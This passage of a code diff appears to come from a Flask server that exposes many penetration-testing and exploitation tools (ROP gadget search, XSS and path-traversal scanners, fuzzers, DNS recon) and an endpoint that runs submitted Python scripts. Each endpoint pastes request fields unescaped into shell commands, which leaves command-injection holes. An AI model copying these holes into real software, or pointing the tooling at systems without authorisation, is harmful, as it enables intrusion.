params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง ropper called without binary parameter") return jsonify({"error": "Binary parameter is required"}), 400 - + command = f"ropper --file {binary}" - + if gadget_type == "rop": command += " --rop" elif gadget_type == "jop": @@ -10743,19 +10743,19 @@ def ropper(): command += " --sys" elif gadget_type == "all": command += " --all" - + if quality > 1: command += f" --quality {quality}" - + if arch: command += f" --arch {arch}" - + if search_string: command += f" --search '{search_string}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting ropper analysis: {binary}") result = execute_command(command) logger.info(f"๐Ÿ“Š ropper analysis completed") @@ -10774,25 +10774,25 @@ def pwninit(): ld = params.get("ld", "") template_type = params.get("template_type", "python") # python, c additional_args = params.get("additional_args", "") - + if not binary: logger.warning("๐Ÿ”ง pwninit called without binary parameter") return jsonify({"error": "Binary parameter is required"}), 400 - + command = f"pwninit --bin {binary}" - + if libc: command += f" --libc {libc}" - + if ld: command += f" --ld {ld}" - + if template_type: command += f" --template {template_type}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ง Starting pwninit setup: {binary}") result = execute_command(command) logger.info(f"๐Ÿ“Š pwninit setup completed") @@ -10814,18 +10814,18 @@ def feroxbuster(): wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") threads = params.get("threads", 10) additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Feroxbuster called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"feroxbuster -u {url} -w {wordlist} -t {threads}" - + if additional_args: command += f" 
{additional_args}" - + logger.info(f"๐Ÿ” Starting Feroxbuster scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Feroxbuster scan completed for {url}") @@ -10844,20 +10844,20 @@ def dotdotpwn(): target = params.get("target", "") module = params.get("module", "http") additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŽฏ DotDotPwn called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"dotdotpwn -m {module} -h {target}" - + if additional_args: command += f" {additional_args}" - + command += " -b" - + logger.info(f"๐Ÿ” Starting DotDotPwn scan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š DotDotPwn scan completed for {target}") @@ -10876,21 +10876,21 @@ def xsser(): url = params.get("url", "") params_str = params.get("params", "") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ XSSer called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"xsser --url '{url}'" - + if params_str: command += f" --param='{params_str}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting XSSer scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š XSSer scan completed for {url}") @@ -10909,18 +10909,18 @@ def wfuzz(): url = params.get("url", "") wordlist = params.get("wordlist", "/usr/share/wordlists/dirb/common.txt") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Wfuzz called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - + command = f"wfuzz -w {wordlist} '{url}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Wfuzz scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Wfuzz scan completed for {url}") @@ -10946,19 +10946,19 @@ def dirsearch(): threads = params.get("threads", 30) recursive = params.get("recursive", False) additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Dirsearch called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + command = f"dirsearch -u {url} -e {extensions} -w {wordlist} -t {threads}" - + if recursive: command += " -r" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ“ Starting Dirsearch scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Dirsearch scan completed for {url}") @@ -10978,25 +10978,25 @@ def katana(): form_extraction = params.get("form_extraction", True) output_format = params.get("output_format", "json") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Katana called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + command = f"katana -u {url} -d {depth}" - + if js_crawl: command += " -jc" - + if form_extraction: command += " -fx" - + if output_format == "json": command += " -jsonl" - + if additional_args: command += f" {additional_args}" - + logger.info(f"โš”๏ธ Starting Katana crawl: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Katana crawl completed for {url}") @@ -11015,25 +11015,25 @@ def gau(): include_subs = params.get("include_subs", True) blacklist = params.get("blacklist", "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico") additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ Gau called without domain parameter") 
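Each endpoint repeats the same guard: fetch a JSON field, log a warning, and return a 400 if the field is empty. Purely as an illustrative refactor sketch (the decorator below does not exist in this codebase), the pattern could be centralised so each handler declares its required parameters once:

```python
# Hypothetical sketch: one decorator to replace the per-endpoint
# required-parameter checks repeated throughout this diff.
from functools import wraps

from flask import Flask, jsonify, request

app = Flask(__name__)

def require_params(*names):
    """Reject the request with a 400 if any named JSON field is missing or empty."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(*args, **kwargs):
            data = request.get_json(silent=True) or {}
            missing = [n for n in names if not data.get(n)]
            if missing:
                return jsonify({"error": f"Missing required parameter(s): {', '.join(missing)}"}), 400
            return fn(*args, **kwargs)
        return wrapper
    return decorator

@app.route("/api/tools/gau", methods=["POST"])  # route name mirrors the handler above
@require_params("domain")
def gau_endpoint():
    domain = request.json["domain"]
    return jsonify({"success": True, "domain": domain})
```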
return jsonify({"error": "Domain parameter is required"}), 400 - + command = f"gau {domain}" - + if providers != "wayback,commoncrawl,otx,urlscan": command += f" --providers {providers}" - + if include_subs: command += " --subs" - + if blacklist: command += f" --blacklist {blacklist}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ“ก Starting Gau URL discovery: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š Gau URL discovery completed for {domain}") @@ -11051,22 +11051,22 @@ def waybackurls(): get_versions = params.get("get_versions", False) no_subs = params.get("no_subs", False) additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ Waybackurls called without domain parameter") return jsonify({"error": "Domain parameter is required"}), 400 - + command = f"waybackurls {domain}" - + if get_versions: command += " --get-versions" - + if no_subs: command += " --no-subs" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ•ฐ๏ธ Starting Waybackurls discovery: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š Waybackurls discovery completed for {domain}") @@ -11087,25 +11087,25 @@ def arjun(): threads = params.get("threads", 25) stable = params.get("stable", False) additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Arjun called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + command = f"arjun -u {url} -m {method} -t {threads}" - + if wordlist: command += f" -w {wordlist}" - + if delay > 0: command += f" -d {delay}" - + if stable: command += " --stable" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐ŸŽฏ Starting Arjun parameter discovery: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Arjun parameter discovery completed for {url}") @@ -11124,22 +11124,22 @@ def paramspider(): exclude = params.get("exclude", "png,jpg,gif,jpeg,swf,woff,svg,pdf,css,ico") output = params.get("output", "") additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ ParamSpider called without domain parameter") return jsonify({"error": "Domain parameter is required"}), 400 - + command = f"paramspider -d {domain} -l {level}" - + if exclude: command += f" --exclude {exclude}" - + if output: command += f" -o {output}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ•ท๏ธ Starting ParamSpider mining: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š ParamSpider mining completed for {domain}") @@ -11159,22 +11159,22 @@ def x8(): body = params.get("body", "") headers = params.get("headers", "") additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ x8 called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + command = f"x8 -u {url} -w {wordlist} -X {method}" - + if body: command += f" -b '{body}'" - + if headers: command += f" -H '{headers}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting x8 parameter discovery: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š x8 parameter discovery completed for {url}") @@ -11194,22 +11194,22 @@ def jaeles(): threads = params.get("threads", 20) timeout = params.get("timeout", 20) additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐ŸŒ Jaeles called without URL parameter") return jsonify({"error": "URL parameter is 
required"}), 400 - + command = f"jaeles scan -u {url} -c {threads} --timeout {timeout}" - + if signatures: command += f" -s {signatures}" - + if config: command += f" --config {config}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ”ฌ Starting Jaeles vulnerability scan: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Jaeles vulnerability scan completed for {url}") @@ -11230,31 +11230,31 @@ def dalfox(): mining_dict = params.get("mining_dict", True) custom_payload = params.get("custom_payload", "") additional_args = params.get("additional_args", "") - + if not url and not pipe_mode: logger.warning("๐ŸŒ Dalfox called without URL parameter") return jsonify({"error": "URL parameter is required"}), 400 - + if pipe_mode: command = "dalfox pipe" else: command = f"dalfox url {url}" - + if blind: command += " --blind" - + if mining_dom: command += " --mining-dom" - + if mining_dict: command += " --mining-dict" - + if custom_payload: command += f" --custom-payload '{custom_payload}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐ŸŽฏ Starting Dalfox XSS scan: {url if url else 'pipe mode'}") result = execute_command(command) logger.info(f"๐Ÿ“Š Dalfox XSS scan completed") @@ -11277,34 +11277,34 @@ def httpx(): web_server = params.get("web_server", False) threads = params.get("threads", 50) additional_args = params.get("additional_args", "") - + if not target: logger.warning("๐ŸŒ httpx called without target parameter") return jsonify({"error": "Target parameter is required"}), 400 - + command = f"httpx -l {target} -t {threads}" - + if probe: command += " -probe" - + if tech_detect: command += " -tech-detect" - + if status_code: command += " -sc" - + if content_length: command += " -cl" - + if title: command += " -title" - + if web_server: command += " -server" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐ŸŒ Starting httpx probe: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š httpx probe completed for {target}") @@ -11321,19 +11321,19 @@ def anew(): input_data = params.get("input_data", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") - + if not input_data: logger.warning("๐Ÿ“ Anew called without input data") return jsonify({"error": "Input data is required"}), 400 - + if output_file: command = f"echo '{input_data}' | anew {output_file}" else: command = f"echo '{input_data}' | anew" - + if additional_args: command += f" {additional_args}" - + logger.info("๐Ÿ“ Starting anew data processing") result = execute_command(command) logger.info("๐Ÿ“Š anew data processing completed") @@ -11350,16 +11350,16 @@ def qsreplace(): urls = params.get("urls", "") replacement = params.get("replacement", "FUZZ") additional_args = params.get("additional_args", "") - + if not urls: logger.warning("๐ŸŒ qsreplace called without URLs") return jsonify({"error": "URLs parameter is required"}), 400 - + command = f"echo '{urls}' | qsreplace '{replacement}'" - + if additional_args: command += f" {additional_args}" - + logger.info("๐Ÿ”„ Starting qsreplace parameter replacement") result = execute_command(command) logger.info("๐Ÿ“Š qsreplace parameter replacement completed") @@ -11377,22 +11377,22 @@ def uro(): whitelist = params.get("whitelist", "") blacklist = params.get("blacklist", "") additional_args = params.get("additional_args", "") - + if not urls: logger.warning("๐ŸŒ uro called without URLs") return jsonify({"error": "URLs parameter is required"}), 
400 - + command = f"echo '{urls}' | uro" - + if whitelist: command += f" --whitelist {whitelist}" - + if blacklist: command += f" --blacklist {blacklist}" - + if additional_args: command += f" {additional_args}" - + logger.info("๐Ÿ” Starting uro URL filtering") result = execute_command(command) logger.info("๐Ÿ“Š uro URL filtering completed") @@ -11411,7 +11411,7 @@ def uro(): class HTTPTestingFramework: """Advanced HTTP testing framework as Burp Suite alternative""" - + def __init__(self): self.session = requests.Session() self.session.headers.update({ @@ -11422,15 +11422,15 @@ class HTTPTestingFramework: self.match_replace_rules = [] # [{'where':'query|headers|body|url','pattern':'regex','replacement':'str'}] self.scope = None # {'host': 'example.com', 'include_subdomains': True} self._req_id = 0 - + def setup_proxy(self, proxy_port: int = 8080): """Setup HTTP proxy for request interception""" self.session.proxies = { 'http': f'http://127.0.0.1:{proxy_port}', 'https': f'http://127.0.0.1:{proxy_port}' } - - def intercept_request(self, url: str, method: str = 'GET', data: dict = None, + + def intercept_request(self, url: str, method: str = 'GET', data: dict = None, headers: dict = None, cookies: dict = None) -> dict: """Intercept and analyze HTTP requests""" try: @@ -11443,7 +11443,7 @@ class HTTPTestingFramework: url, data, send_headers = self._apply_match_replace(url, data, dict(self.session.headers)) if headers: send_headers.update(headers) - + if method.upper() == 'GET': response = self.session.get(url, params=data, headers=send_headers, timeout=30) elif method.upper() == 'POST': @@ -11454,7 +11454,7 @@ class HTTPTestingFramework: response = self.session.delete(url, headers=send_headers, timeout=30) else: response = self.session.request(method, url, data=data, headers=send_headers, timeout=30) - + # Store request/response in history self._req_id += 1 request_data = { @@ -11465,7 +11465,7 @@ class HTTPTestingFramework: 'data': data, 'timestamp': datetime.now().isoformat() } - + response_data = { 'status_code': response.status_code, 'headers': dict(response.headers), @@ -11473,22 +11473,22 @@ class HTTPTestingFramework: 'size': len(response.content), 'time': response.elapsed.total_seconds() } - + self.proxy_history.append({ 'request': request_data, 'response': response_data }) - + # Analyze for vulnerabilities self._analyze_response_for_vulns(url, response) - + return { 'success': True, 'request': request_data, 'response': response_data, 'vulnerabilities': self._get_recent_vulns() } - + except Exception as e: logger.error(f"{ModernVisualEngine.format_error_card('ERROR', 'HTTP-Framework', str(e))}") return {'success': False, 'error': str(e)} @@ -11617,11 +11617,11 @@ class HTTPTestingFramework: 'tested': total, 'interesting': interesting[:50] } - + def _analyze_response_for_vulns(self, url: str, response): """Analyze HTTP response for common vulnerabilities""" vulns = [] - + # Check for missing security headers security_headers = { 'X-Frame-Options': 'Clickjacking protection missing', @@ -11630,7 +11630,7 @@ class HTTPTestingFramework: 'Strict-Transport-Security': 'HTTPS enforcement missing', 'Content-Security-Policy': 'Content Security Policy missing' } - + for header, description in security_headers.items(): if header not in response.headers: vulns.append({ @@ -11640,7 +11640,7 @@ class HTTPTestingFramework: 'url': url, 'header': header }) - + # Check for sensitive information disclosure sensitive_patterns = [ (r'password\s*[:=]\s*["\']?([^"\'\s]+)', 'Password disclosure'), @@ -11648,7 
+11648,7 @@ class HTTPTestingFramework: (r'secret\s*[:=]\s*["\']?([^"\'\s]+)', 'Secret disclosure'), (r'token\s*[:=]\s*["\']?([^"\'\s]+)', 'Token disclosure') ] - + for pattern, description in sensitive_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) if matches: @@ -11659,7 +11659,7 @@ class HTTPTestingFramework: 'url': url, 'matches': matches[:5] # Limit matches }) - + # Check for SQL injection indicators sql_errors = [ 'SQL syntax error', @@ -11668,7 +11668,7 @@ class HTTPTestingFramework: 'Microsoft OLE DB Provider', 'PostgreSQL query failed' ] - + for error in sql_errors: if error.lower() in response.text.lower(): vulns.append({ @@ -11677,13 +11677,13 @@ class HTTPTestingFramework: 'description': f'Potential SQL injection: {error}', 'url': url }) - + self.vulnerabilities.extend(vulns) - + def _get_recent_vulns(self, limit: int = 10): """Get recent vulnerabilities found""" return self.vulnerabilities[-limit:] if self.vulnerabilities else [] - + def spider_website(self, base_url: str, max_depth: int = 3, max_pages: int = 100) -> dict: """Spider website to discover endpoints and forms""" try: @@ -11691,32 +11691,32 @@ class HTTPTestingFramework: forms = [] to_visit = [(base_url, 0)] visited = set() - + while to_visit and len(discovered_urls) < max_pages: current_url, depth = to_visit.pop(0) - + if current_url in visited or depth > max_depth: continue - + visited.add(current_url) - + try: response = self.session.get(current_url, timeout=10) if response.status_code == 200: discovered_urls.add(current_url) - + # Parse HTML for links and forms soup = BeautifulSoup(response.text, 'html.parser') - + # Find all links for link in soup.find_all('a', href=True): href = link['href'] full_url = urljoin(current_url, href) - + if urlparse(full_url).netloc == urlparse(base_url).netloc: if full_url not in visited and depth < max_depth: to_visit.append((full_url, depth + 1)) - + # Find all forms for form in soup.find_all('form'): form_data = { @@ -11725,20 +11725,20 @@ class HTTPTestingFramework: 'method': form.get('method', 'GET').upper(), 'inputs': [] } - + for input_tag in form.find_all(['input', 'textarea', 'select']): form_data['inputs'].append({ 'name': input_tag.get('name', ''), 'type': input_tag.get('type', 'text'), 'value': input_tag.get('value', '') }) - + forms.append(form_data) - + except Exception as e: logger.warning(f"Error spidering {current_url}: {str(e)}") continue - + return { 'success': True, 'discovered_urls': list(discovered_urls), @@ -11746,79 +11746,79 @@ class HTTPTestingFramework: 'total_pages': len(discovered_urls), 'vulnerabilities': self._get_recent_vulns() } - + except Exception as e: logger.error(f"{ModernVisualEngine.format_error_card('ERROR', 'Spider', str(e))}") return {'success': False, 'error': str(e)} class BrowserAgent: """AI-powered browser agent for web application testing and inspection""" - + def __init__(self): self.driver = None self.screenshots = [] self.page_sources = [] self.network_logs = [] - + def setup_browser(self, headless: bool = True, proxy_port: int = None): """Setup Chrome browser with security testing options""" try: chrome_options = Options() - + if headless: chrome_options.add_argument('--headless') - + chrome_options.add_argument('--no-sandbox') chrome_options.add_argument('--disable-dev-shm-usage') chrome_options.add_argument('--disable-gpu') chrome_options.add_argument('--window-size=1920,1080') chrome_options.add_argument('--user-agent=HexStrike-BrowserAgent/1.0 (Security Testing)') - + # Enable logging 
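`spider_website` above drives a breadth-first, same-origin crawl with `requests`, `BeautifulSoup`, and `urljoin`/`urlparse`. A condensed, self-contained sketch of that same idea, with made-up depth and page limits:

```python
# Self-contained sketch of the same-origin BFS crawl used by
# spider_website above (limits and URL are illustrative).
from urllib.parse import urljoin, urlparse

import requests
from bs4 import BeautifulSoup

def crawl(base_url, max_depth=2, max_pages=50):
    """Breadth-first crawl staying on base_url's host; returns discovered URLs."""
    host = urlparse(base_url).netloc
    queue, seen, found = [(base_url, 0)], set(), set()
    while queue and len(found) < max_pages:
        url, depth = queue.pop(0)
        if url in seen or depth > max_depth:
            continue
        seen.add(url)
        try:
            resp = requests.get(url, timeout=10)
        except requests.RequestException:
            continue
        if resp.status_code != 200:
            continue
        found.add(url)
        for a in BeautifulSoup(resp.text, "html.parser").find_all("a", href=True):
            nxt = urljoin(url, a["href"])
            if urlparse(nxt).netloc == host:  # stay in scope
                queue.append((nxt, depth + 1))
    return found

# print(crawl("https://example.com"))
```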
chrome_options.add_argument('--enable-logging') chrome_options.add_argument('--log-level=0') - + # Security testing options chrome_options.add_argument('--disable-web-security') chrome_options.add_argument('--allow-running-insecure-content') chrome_options.add_argument('--ignore-certificate-errors') chrome_options.add_argument('--ignore-ssl-errors') - + if proxy_port: chrome_options.add_argument(f'--proxy-server=http://127.0.0.1:{proxy_port}') - + # Enable network logging chrome_options.set_capability('goog:loggingPrefs', {'performance': 'ALL'}) - + self.driver = webdriver.Chrome(options=chrome_options) self.driver.set_page_load_timeout(30) - + logger.info(f"{ModernVisualEngine.format_tool_status('BrowserAgent', 'RUNNING', 'Chrome Browser Initialized')}") return True - + except Exception as e: logger.error(f"{ModernVisualEngine.format_error_card('ERROR', 'BrowserAgent', str(e))}") return False - + def navigate_and_inspect(self, url: str, wait_time: int = 5) -> dict: """Navigate to URL and perform comprehensive inspection""" try: if not self.driver: if not self.setup_browser(): return {'success': False, 'error': 'Failed to setup browser'} - + nav_command = f'Navigate to {url}' logger.info(f"{ModernVisualEngine.format_command_execution(nav_command, 'STARTING')}") - + # Navigate to URL self.driver.get(url) time.sleep(wait_time) - + # Take screenshot screenshot_path = f"/tmp/hexstrike_screenshot_{int(time.time())}.png" self.driver.save_screenshot(screenshot_path) self.screenshots.append(screenshot_path) - + # Get page source page_source = self.driver.page_source self.page_sources.append({ @@ -11826,12 +11826,12 @@ class BrowserAgent: 'source': page_source[:50000], # Limit size 'timestamp': datetime.now().isoformat() }) - + # Extract page information page_info = { 'title': self.driver.title, 'url': self.driver.current_url, - 'cookies': [{'name': c['name'], 'value': c['value'], 'domain': c['domain']} + 'cookies': [{'name': c['name'], 'value': c['value'], 'domain': c['domain']} for c in self.driver.get_cookies()], 'local_storage': self._get_local_storage(), 'session_storage': self._get_session_storage(), @@ -11842,7 +11842,7 @@ class BrowserAgent: 'network_requests': self._get_network_logs(), 'console_errors': self._get_console_errors() } - + # Analyze for security issues security_analysis = self._analyze_page_security(page_source, page_info) # Merge extended passive analysis @@ -11851,9 +11851,9 @@ class BrowserAgent: security_analysis['total_issues'] = len(security_analysis['issues']) security_analysis['security_score'] = max(0, 100 - (security_analysis['total_issues'] * 5)) security_analysis['passive_modules'] = extended_passive.get('modules', []) - + logger.info(f"{ModernVisualEngine.format_tool_status('BrowserAgent', 'SUCCESS', url)}") - + return { 'success': True, 'page_info': page_info, @@ -11861,11 +11861,11 @@ class BrowserAgent: 'screenshot': screenshot_path, 'timestamp': datetime.now().isoformat() } - + except Exception as e: logger.error(f"{ModernVisualEngine.format_error_card('ERROR', 'BrowserAgent', str(e))}") return {'success': False, 'error': str(e)} - + # ---------------------- Browser Deep Introspection Helpers ---------------------- def _get_console_errors(self) -> list: """Collect console errors & warnings (if supported)""" @@ -11995,7 +11995,7 @@ class BrowserAgent: """) except: return {} - + def _get_session_storage(self) -> dict: """Extract session storage data""" try: @@ -12009,7 +12009,7 @@ class BrowserAgent: """) except: return {} - + def _extract_forms(self) -> list: 
"""Extract all forms from the page""" forms = [] @@ -12021,7 +12021,7 @@ class BrowserAgent: 'method': form.get_attribute('method') or 'GET', 'inputs': [] } - + inputs = form.find_elements(By.TAG_NAME, 'input') for input_elem in inputs: form_data['inputs'].append({ @@ -12029,13 +12029,13 @@ class BrowserAgent: 'type': input_elem.get_attribute('type') or 'text', 'value': input_elem.get_attribute('value') or '' }) - + forms.append(form_data) except: pass - + return forms - + def _extract_links(self) -> list: """Extract all links from the page""" links = [] @@ -12050,9 +12050,9 @@ class BrowserAgent: }) except: pass - + return links - + def _extract_inputs(self) -> list: """Extract all input elements""" inputs = [] @@ -12067,9 +12067,9 @@ class BrowserAgent: }) except: pass - + return inputs - + def _extract_scripts(self) -> list: """Extract script sources and inline scripts""" scripts = [] @@ -12088,15 +12088,15 @@ class BrowserAgent: }) except: pass - + return scripts - + def _get_network_logs(self) -> list: """Get network request logs""" try: logs = self.driver.get_log('performance') network_requests = [] - + for log in logs[-50:]: # Last 50 logs message = json.loads(log['message']) if message['message']['method'] == 'Network.responseReceived': @@ -12107,15 +12107,15 @@ class BrowserAgent: 'mimeType': response['mimeType'], 'headers': response.get('headers', {}) }) - + return network_requests except: return [] - + def _analyze_page_security(self, page_source: str, page_info: dict) -> dict: """Analyze page for security vulnerabilities""" issues = [] - + # Check for sensitive data in local/session storage for storage_type, storage_data in [('localStorage', page_info.get('local_storage', {})), ('sessionStorage', page_info.get('session_storage', {}))]: @@ -12127,10 +12127,10 @@ class BrowserAgent: 'description': f'Sensitive data found in {storage_type}: {key}', 'location': storage_type }) - + # Check for forms without CSRF protection for form in page_info.get('forms', []): - has_csrf = any('csrf' in input_data['name'].lower() or 'token' in input_data['name'].lower() + has_csrf = any('csrf' in input_data['name'].lower() or 'token' in input_data['name'].lower() for input_data in form['inputs']) if not has_csrf and form['method'].upper() == 'POST': issues.append({ @@ -12139,7 +12139,7 @@ class BrowserAgent: 'description': 'Form without CSRF protection detected', 'form_action': form['action'] }) - + # Check for inline JavaScript inline_scripts = [s for s in page_info.get('scripts', []) if s['type'] == 'inline'] if inline_scripts: @@ -12149,13 +12149,13 @@ class BrowserAgent: 'description': f'Found {len(inline_scripts)} inline JavaScript blocks', 'count': len(inline_scripts) }) - + return { 'total_issues': len(issues), 'issues': issues, 'security_score': max(0, 100 - (len(issues) * 10)) # Simple scoring } - + def close_browser(self): """Close the browser instance""" if self.driver: @@ -12362,82 +12362,82 @@ def burpsuite_alternative(): headless = params.get("headless", True) max_depth = params.get("max_depth", 3) max_pages = params.get("max_pages", 50) - + if not target: return jsonify({"error": "Target parameter is required"}), 400 - + logger.info(f"{ModernVisualEngine.create_section_header('BURP SUITE ALTERNATIVE', '๐Ÿ”ฅ', 'BLOOD_RED')}") scan_message = f'Starting {scan_type} scan of {target}' logger.info(f"{ModernVisualEngine.format_highlighted_text(scan_message, 'RED')}") - + results = { 'target': target, 'scan_type': scan_type, 'timestamp': datetime.now().isoformat(), 'success': True } - + # 
Phase 1: Browser-based reconnaissance if scan_type in ['comprehensive', 'spider']: logger.info(f"{ModernVisualEngine.format_tool_status('BrowserAgent', 'RUNNING', 'Reconnaissance Phase')}") - + if not browser_agent.driver: browser_agent.setup_browser(headless) - + browser_result = browser_agent.navigate_and_inspect(target) results['browser_analysis'] = browser_result - + # Phase 2: HTTP spidering if scan_type in ['comprehensive', 'spider']: logger.info(f"{ModernVisualEngine.format_tool_status('HTTP-Spider', 'RUNNING', 'Discovery Phase')}") - + spider_result = http_framework.spider_website(target, max_depth, max_pages) results['spider_analysis'] = spider_result - + # Phase 3: Vulnerability analysis if scan_type in ['comprehensive', 'active']: logger.info(f"{ModernVisualEngine.format_tool_status('VulnScanner', 'RUNNING', 'Analysis Phase')}") - + # Test discovered endpoints discovered_urls = results.get('spider_analysis', {}).get('discovered_urls', [target]) vuln_results = [] - + for url in discovered_urls[:20]: # Limit to 20 URLs test_result = http_framework.intercept_request(url) if test_result.get('success'): vuln_results.append(test_result) - + results['vulnerability_analysis'] = { 'tested_urls': len(vuln_results), 'total_vulnerabilities': len(http_framework.vulnerabilities), 'recent_vulnerabilities': http_framework._get_recent_vulns(20) } - + # Generate summary total_vulns = len(http_framework.vulnerabilities) vuln_summary = {} for vuln in http_framework.vulnerabilities: severity = vuln.get('severity', 'unknown') vuln_summary[severity] = vuln_summary.get(severity, 0) + 1 - + results['summary'] = { 'total_vulnerabilities': total_vulns, 'vulnerability_breakdown': vuln_summary, 'pages_analyzed': len(results.get('spider_analysis', {}).get('discovered_urls', [])), 'security_score': max(0, 100 - (total_vulns * 5)) } - + # Display summary with enhanced colors logger.info(f"{ModernVisualEngine.create_section_header('SCAN COMPLETE', 'โœ…', 'SUCCESS')}") vuln_message = f'Found {total_vulns} vulnerabilities' color_choice = 'YELLOW' if total_vulns > 0 else 'GREEN' logger.info(f"{ModernVisualEngine.format_highlighted_text(vuln_message, color_choice)}") - + for severity, count in vuln_summary.items(): logger.info(f" {ModernVisualEngine.format_vulnerability_severity(severity, count)}") - + return jsonify(results) - + except Exception as e: logger.error(f"{ModernVisualEngine.format_error_card('CRITICAL', 'BurpAlternative', str(e))}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -12460,32 +12460,32 @@ def zap(): format_type = params.get("format", "xml") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") - + if not target and scan_type != "daemon": logger.warning("๐ŸŽฏ ZAP called without target parameter") return jsonify({ "error": "Target parameter is required for scans" }), 400 - + if daemon: command = f"zaproxy -daemon -host {host} -port {port}" if api_key: command += f" -config api.key={api_key}" else: command = f"zaproxy -cmd -quickurl {target}" - + if format_type: command += f" -quickout {format_type}" - + if output_file: command += f" -quickprogress -dir \"{output_file}\"" - + if api_key: command += f" -config api.key={api_key}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting ZAP scan: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š ZAP scan completed for {target}") @@ -12503,18 +12503,18 @@ def wafw00f(): params = request.json target = params.get("target", "") additional_args = 
params.get("additional_args", "") - + if not target: logger.warning("๐Ÿ›ก๏ธ Wafw00f called without target parameter") return jsonify({ "error": "Target parameter is required" }), 400 - + command = f"wafw00f {target}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ›ก๏ธ Starting Wafw00f WAF detection: {target}") result = execute_command(command) logger.info(f"๐Ÿ“Š Wafw00f completed for {target}") @@ -12533,21 +12533,21 @@ def fierce(): domain = params.get("domain", "") dns_server = params.get("dns_server", "") additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ Fierce called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 - + command = f"fierce --domain {domain}" - + if dns_server: command += f" --dns-servers {dns_server}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting Fierce DNS recon: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š Fierce completed for {domain}") @@ -12567,24 +12567,24 @@ def dnsenum(): dns_server = params.get("dns_server", "") wordlist = params.get("wordlist", "") additional_args = params.get("additional_args", "") - + if not domain: logger.warning("๐ŸŒ DNSenum called without domain parameter") return jsonify({ "error": "Domain parameter is required" }), 400 - + command = f"dnsenum {domain}" - + if dns_server: command += f" --dnsserver {dns_server}" - + if wordlist: command += f" --file {wordlist}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting DNSenum: {domain}") result = execute_command(command) logger.info(f"๐Ÿ“Š DNSenum completed for {domain}") @@ -12603,13 +12603,13 @@ def install_python_package(): params = request.json package = params.get("package", "") env_name = params.get("env_name", "default") - + if not package: return jsonify({"error": "Package name is required"}), 400 - + logger.info(f"๐Ÿ“ฆ Installing Python package: {package} in env {env_name}") success = env_manager.install_package(env_name, package) - + if success: return jsonify({ "success": True, @@ -12621,7 +12621,7 @@ def install_python_package(): "success": False, "error": f"Failed to install package {package}" }), 500 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error installing Python package: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -12634,32 +12634,32 @@ def execute_python_script(): script = params.get("script", "") env_name = params.get("env_name", "default") filename = params.get("filename", f"script_{int(time.time())}.py") - + if not script: return jsonify({"error": "Script content is required"}), 400 - + # Create script file script_result = file_manager.create_file(filename, script) if not script_result["success"]: return jsonify(script_result), 500 - + # Get 